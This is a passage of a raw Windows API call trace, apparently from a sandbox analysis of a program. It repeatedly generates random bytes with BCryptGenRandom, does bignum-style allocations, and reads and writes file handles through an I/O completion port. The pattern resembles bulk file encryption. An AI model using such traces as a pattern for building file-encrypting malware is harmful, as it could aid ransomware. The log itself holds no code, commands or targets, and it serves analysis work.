hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.034] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.034] free (_Block=0x3e305b8) [0146.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.034] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.034] free (_Block=0x1fa91d0) [0146.034] free (_Block=0x1fa2ed8) [0146.035] free (_Block=0x1fa90b8) [0146.035] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.035] CloseHandle (hObject=0x3cc) returned 1 [0146.035] free (_Block=0x3e70008) [0146.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.036] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.103] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x11e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.104] CloseHandle (hObject=0x170) returned 1 [0146.104] free (_Block=0x3d70450) [0146.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.119] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.119] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.119] free (_Block=0x3e305b8) [0146.119] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.119] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.119] free (_Block=0x1fa91d0) [0146.119] free (_Block=0x1fa2ed8) [0146.119] free (_Block=0x1fa90b8) [0146.119] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.131] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.131] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.158] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ec4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0146.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.184] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2370, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0146.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.203] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.203] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.203] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.204] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.204] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.204] free (_Block=0x3e305b8) [0146.204] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.204] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.205] free (_Block=0x1fa91d0) [0146.205] free (_Block=0x1fa2ed8) [0146.205] free (_Block=0x1fa90b8) [0146.205] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0146.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.216] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.231] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x29ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0146.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.235] CloseHandle (hObject=0xec) returned 1 [0146.236] free (_Block=0x3ef0008) [0146.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.236] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2c60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0146.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.679] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1190, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0146.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.680] CloseHandle (hObject=0x2a4) returned 1 [0146.681] free (_Block=0x3e70008) [0146.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.690] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.691] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.691] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.691] free (_Block=0x3e305b8) [0146.691] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.691] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.692] free (_Block=0x1fa91d0) [0146.692] free (_Block=0x1fa2ed8) [0146.692] free (_Block=0x1fa90b8) [0146.692] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.693] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.705] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x778, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.706] CloseHandle (hObject=0x2a4) returned 1 [0146.706] free (_Block=0x3df0008) [0146.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.716] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.716] free (_Block=0x3e305b8) [0146.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.716] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.716] free (_Block=0x1fa91d0) [0146.717] free (_Block=0x1fa2ed8) [0146.717] free (_Block=0x1fa90b8) [0146.717] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.718] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1eb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.730] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1fc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.732] CloseHandle (hObject=0x2a4) returned 1 [0146.732] free (_Block=0x3df0008) [0146.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.742] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.742] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.743] free (_Block=0x3e305b8) [0146.743] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.743] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.743] free (_Block=0x1fa91d0) [0146.743] free (_Block=0x1fa2ed8) [0146.743] free (_Block=0x1fa90b8) [0146.743] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.745] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.756] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe78, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.757] CloseHandle (hObject=0x2a4) returned 1 [0146.757] free (_Block=0x3df0008) [0146.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.769] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.769] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.769] free (_Block=0x3e305b8) [0146.769] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.770] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.770] free (_Block=0x1fa91d0) [0146.770] free (_Block=0x1fa2ed8) [0146.770] free (_Block=0x1fa90b8) [0146.770] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.872] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.931] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.931] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.931] free (_Block=0x3e305b8) [0146.931] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.931] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.931] free (_Block=0x1fa91d0) [0146.931] free (_Block=0x1fa2ed8) [0146.931] free (_Block=0x1fa90b8) [0146.931] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.932] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.936] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.947] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.948] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.948] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.948] free (_Block=0x3e305b8) [0146.948] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.948] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.949] free (_Block=0x1fa91d0) [0146.949] free (_Block=0x1fa2ed8) [0146.949] free (_Block=0x1fa90b8) [0146.949] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.961] LoadLibraryA 